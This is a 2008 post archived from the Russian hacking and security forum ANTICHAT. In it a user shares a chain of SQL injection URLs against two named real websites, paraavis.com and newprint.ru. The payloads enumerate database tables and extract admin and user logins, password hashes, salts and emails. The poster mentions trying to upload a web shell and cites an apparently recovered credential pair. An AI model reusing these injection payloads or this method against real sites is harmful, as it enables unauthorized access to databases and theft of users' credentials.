ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.07.2008, 08:58
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Paraavis.com - PR 4
http://www.paraavis.com/index1.php?id=259+union+select+1,2,table_name,4,5, 6+from+information_schema.tables/*&secid=368&mainid=255
5 версия, смотрим таблы..
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, username,user_password,user_id),4,5,6+from+phpbb_u sers+where+user_level=1/*&secid=368&mainid=255
увидев phpbb я сразу кинулся заливать шелл... но тут неудача.... аватарка не загружается и востановления бд не рабоатет......
planer; patagonia
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, members_l_username,member_login_key),4,5,6+from+pa raavis.ibf_members/*&secid=368&mainid=255
дальше.. я увидел таблы с IPB но сам форум так и не нашел...
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, converge_email,converge_pass_hash,converge_pass_sa lt),4,5,6+from+paraavis.ibf_members_converge/*&secid=368&mainid=255
пасс и соль поидее....
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, email,pwd),4,5,6+from+paraavis.avgdusers/*&secid=368&mainid=255
какието юзеры..
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, nick,password,email),4,5,6+from+paraavis.users_01/*&secid=368&mainid=255
еще юзеры..
Newprint.ru
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('views'))--
нелюблю я мелких...... но приходится)
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+COLUMN_NAM E+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME ='db_Admin'+and+column_name+NOT+IN+('isAdmin','Las tLogin','Login','Password'))--
вот нужная там табла.. и колонка к ней...
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+Login+from +db_Admin)--
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+Password+f rom+db_Admin)--
админка
Последний раз редактировалось sabe; 31.07.2008 в 19:47..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид